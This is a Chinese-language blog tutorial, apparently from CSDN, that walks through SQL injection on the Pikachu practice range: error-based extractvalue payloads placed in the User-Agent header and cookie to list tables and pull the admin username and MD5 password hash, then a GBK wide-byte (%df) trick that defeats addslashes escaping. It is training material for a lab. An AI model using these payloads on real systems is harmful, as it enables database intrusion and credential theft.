http header注入和宽字节注入

最新推荐文章于 2023-08-07 16:31:48 发布
最新推荐文章于 2023-08-07 16:31:48 发布
阅读量290 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: http 数据库 sql 网络安全 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Williamanddog/article/details/128716973
版权

这次我们改用pikachu靶场来演示

1. http header 和 cookie注入

HTTP头注入其实并不是一个新的SQL注入类型,而是指出现SQL注入漏洞的场景。有些时候,后台开发 人员为了验证客户端头信息(比如常用的cookie验证), 或者通过http header头信息获取客户端的一些 资料,比如useragent、accept字段等,会对客户端的http header信息进行获取并使用SQL进行处理, 如果此时没有足够的安全考虑则可能会导致基于http header的SQL注入漏洞。

我们先进入pikachu的 http header 来进行一下测试:

通过登录进去的信息,我们可以看到,它在前端给我们返回了user agent,那我们可以猜测,这个后端是不是对http header里面的数据进行了获取,应该也进 行了相关数据库的操作。

我们来看一下刚才的抓包,将它发送到repeater里面,将User-Agent删掉,自 己构造一个,还是按照之前的思路,先输入一个单引号:

前端给我们返回了报错信息,提示我们sql语法有错,那就可以确定存在sql注入

现在开始进行注入,此处利用报错注入的方法来注入,关于报错注入的内容可以查看之前的文章

(8条消息) DVWA之sql注入——联合注入和报错注入_梓桐sama的博客-CSDN博客

我们构造payload:

' or extractvalue(1,concat(0x7e,database())) or '

根据前端的回显结果,可知库名为pikachu

那接下来注入表数:

构造语句 ' or extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema=database()))) or '

从前端的报错信息中可知有5张表

那现在就要开始爆表名了

构造 ' or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) or '

第一张表为httpinfo

' or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1))) or '

第二张表为member

以此方法分别注入

之后的三张表为:message,users,xssblind

users表中很有可能存放着用户信息,所以我们对users表中的字段进行注入

先注入其字段数

构造:' or extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) or '

可知有四个字段,那接下来就要注入其字段名:

构造:' or extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1))) or '

第一个字段为id

以此方法继续注入,可知后三个字段为:username,password,level

现在我们知道users表中有username和password字段,那我们需要注入出其具体信息

构造:' or extractvalue(1,concat(0x7e,(select username from users where id =1))) or '

注入出id=1的用户为admin

那还需要注入密码

' or extractvalue(1,concat(0x7e,(select password from users where id =1))) or '

注入出密码,但是被MD5加密了,我们可以尝试解密

md5在线解密破解,md5解密加密 (cmd5.com)

可知用户admin对应的密码为123456

那我们其实还可以尝试能不能在别的地方再找到注入点,我们可以用cookie来试一下

我们在cookie信息中的admin后面添加一个单引号,前端回显语法错误,存在SQL注入

那是否可以注入出我们需要的信息呢

构造一个payload:admin' and extractvalue(1,concat(0x7e,database())) or '

注入出库名pikachu,说明利用cookie也是可以注入的

2.宽字节注入

宽字节概念 : 1.单字节字符集:所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127)。 2.多字节字符集:在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字 节来表示。 3.宽字节注入时利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字。

宽字节注入原理

为了防止网站被SQL注入,一些网站开发人员会做一些防护措施,其中最常见的就是对一些特殊字符进行转义。通过前面的学习可以了解到,SQL注入非常关键的一步就是让引号闭合和跳出引号,无法跳出引号,那么输入的内容就永远在引号里,那么输入的东西永远就是字符串,很显然这不符合SQL注入的要求。网站开发者也想到了这一步,于是做个防护措施:转义,对输入的敏感内容、特殊字符进行转义。

addslashes()函数 1.addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 2.预定义字符:单引号('),双引号("),反斜杠(\),NULL 通过前面的SQL注入实验可以发现,字符型的注入点我们都是用单引号来判断的,但是当遇到 addslashes()时,单引号会被转义,导致我们用来判断注入点的单引号失效。 所以我们的目的就是使转 义符 \ 失效、使单引号逃逸。

那么根据宽字节注入的原理可知,后端通过adds lashes()函数在我们构造的单引号前加入别的字符来转义,使得我们构造的sql语句失效。所以我们利用mysql的特性,在转义字符前再添加一个url编码的字符,这时mysql会将其识别为汉字。

下面我们来演示一下:

首先先来做一个正常的查询:

那我们尝试构造一个payload:kobe%df' or 1=1#

%df是用来结合转义字符的。

GBK 编码范围, GBK 编码表 (qqxiuzi.cn)

但是结果确没有注入成功

那我们用burp抓包看一下

从抓包内容来看,我们的%也被url编码了,所以导致我们原先构造的kobe%27变成了kobe

所以我们直接在burp中修改

注入成功

那现在我们就可以利用联合注入的方式来注入

注入出库名pikachu

下面过程不再演示,联合注入内容请查看(8条消息) DVWA之sql注入——联合注入和报错注入_梓桐sama的博客-CSDN博客

梓桐sama
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入进阶之1宽字节注入攻击(Pikachu漏洞练习平台)
ISNS的博客
02-29 4377
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 宽字节注入攻击可以说是SQL注入的进阶攻击方式,在我之前列出的学习计划体系中,前面的union联合查询注入攻击、布尔盲注、报错注入、时间盲注这几种常见的SQL注入方式,在我之前的博客中已经分析过了,那么今天在下面这些进阶的SQL注入方式中,要翻牌的就是宽字节注入。 原理讲解 接下来的讲解,将以问...
[Pikachu靶场实战系列] SQL注入宽字节注入
00勇士王子的博客
08-01 3164
宽字节注入原理 在数据库中使用了宽字符集(GBK,GB2312等),除了英文都是一个字符占两字节; MySQL在使用GBK编码的时候,会认为两个字符为一个汉字(ascii>128才能达到汉字范围); 在PHP中使用addslashes函数的时候,会对单引号%27进行转义,在前边加一个反斜杠”\”,变成%5c%27; 可以在前边添加%df,形成%df%5c%27,而数据进入数据库中时前边的%df%5c两字节会被当成一个汉字; %5c被吃掉了,单引号由此逃逸可以用来闭合语句。 使用PHP函数iconv(‘
pikachu靶场(sql注入)(宽字节注入和盲注)
weixin_54431413的博客
03-17 3685
一、宽字节注入 1.宽字节注入原理 宽字节注入有addslashes,mysql_real_escape_string,mysql_escape_string等转义的函数,对输入'进行了转义\' 在这个靶场是addslashes(),这个函数对这些进行了转义 单引号(') 双引号(") 反斜杠(\) NULL 但是在下方设置编码时设置为了gbk编码, 利用反斜杠编码为%5c,这里用%df构成(連)字绕过对 ' 的转义 2.首先利用burp抓包 然后用 1%df' union selec
SQL注入宽字节注入
qq_43665434的博客
04-12 1372
沉舟侧畔千帆过,病树前头万木春。 什么是宽字节注入? 当后端对用户的输入做了转义时,比如利用addslashes()或mysql_escape_string()函数。此时输入id=1’其中的单引号会被转义而变成id=1\',这样就使得单引号无法闭合数据库中的语句,一般情况下是很难绕过的。但是有两种情况可以通过宽字节注入绕过。 第一中情况是当数据库的编码为GBK时,注入格式为id=1%df',因为反斜杠\的编码为%5c,所以参数传到后端经过转义后就会变成id=1%df%5c',其中GBK会将%df%5c编.
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 662
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入
http header 详解
12-25
HTTP Headers是HTTP请求和相应的核心,它承载了关于客户端浏览器,请求页面,服务器等相关的信息, 此文档帮助你分析HTTP headers
Django接收自定义http header过程详解
09-18
主要介绍了Django接收自定义http header过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
go语言在请求http时加入自定义http header的方法
01-20
本文实例讲述了go语言在请求http时加入自定义http header的方法。分享给大家供大家参考。具体实现方法如下: 代码如下: client := &http.Client{] req, err := http.NewRequest(“POST”, “http://example.com”, ...
php header函数的常用http头设置
12-19
header(‘HTTP/1.1 200 OK'); //设置一个404头: header(‘HTTP/1.1 404 Not Found'); //设置地址被永久的重定向 header(‘HTTP/1.1 301 Moved Permanently'); //转到一个新地址 header(‘Location: ...
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 4690
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
一文了解pikachuSQL注入
allintao的博客
03-01 2504
本文章主要讲解关于pikachu注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
pikachu sql注入 通关手册
最新发布
tj2718647721的博客
08-07 590
手动方式:手工构造SQL语句进行注入点发现自动方式:采用自动扫描工具,自动进行注入点发现。
pikachu-SQL注入
qq_43660551的博客
05-11 1198
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
pikachu~~~insert/update/delete,http注入
weixin_50339832的博客
05-30 706
@[TOC] select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='pikachu' select TABLE_NAME, COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME='users' select username,password from users# UPDATEXML (XML_document, XPa.
pikkachu的“http header注入
weixin_50339082的博客
06-18 578
pikkachu的“http header注入 一、原理 有时候后台开发人员为了验证客户信息(比如cookie验证)或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等 会对客户端的http header信息进行获取并使用sql进行处理,如果此时没有足够的安全考虑则可能会导致基于http headersql注入漏洞。 二、实操 首先登陆 admin/123456 1.UA头 发现有对头部信息的获取,所以可能存在注入,抓包,发送到Repeater。
基于Pikachu测试平台的http header注入
qq_43499389的博客
03-19 1474
http header注入 有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证)或者通过http header头信息获取客户端的一些信息,比如username、accept字段等等 会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑则可能会导致基于http headerSQL Inject漏洞 我们可以先在http header注入...
SQL注入---Cookie注入
Ethan024的博客
03-31 171
Cookie注入 实验环境: 皮卡丘靶场—HTTP Header注入 Cookie作用: Cookie用于跟踪会话,后台会获取前端cookie来进行验证操作。 实验步骤: 根据提示,先login(admin/123456) 使用burpsuite进行抓包,并发送到repeater中 此处有[uname]和[pw],因此猜测此处可能为用户用于登录的cookie 在用户名admin后面增加单引号admin’ 查看返回报文,有数据库报错信息: You have an error in y
piakchu-‘http header注入
weixin_50339521的博客
10-29 1574
pikachu sql注入中的http header 注入
HTTP头部注入
shangMD01的博客
02-18 3181
实验环境 攻击机:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件HackBar等 靶机:SQLi-Labs 安装应用软件:apache、MySQL、PHP;DVWA、SQLi-Labs漏洞网站环境 实验步骤 1.访问SQLi-Labs网站 访问靶机SQLi-Labs上的Less-11: http://靶机ip/sql/Less-18 2.利用Burpsuite工具爪包 (1)启动Burpsuite (2)设置Burpsui.
pikachu靶场"http header"注入
07-27
你可以使用各种工具和技术来实施注入攻击,例如修改User-Agent、Referer或Cookie等header字段中的内容。 但请注意,在真实的环境中,HTTP header注入是一种严重的安全威胁,攻击者可以利用它来获取敏感信息或执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值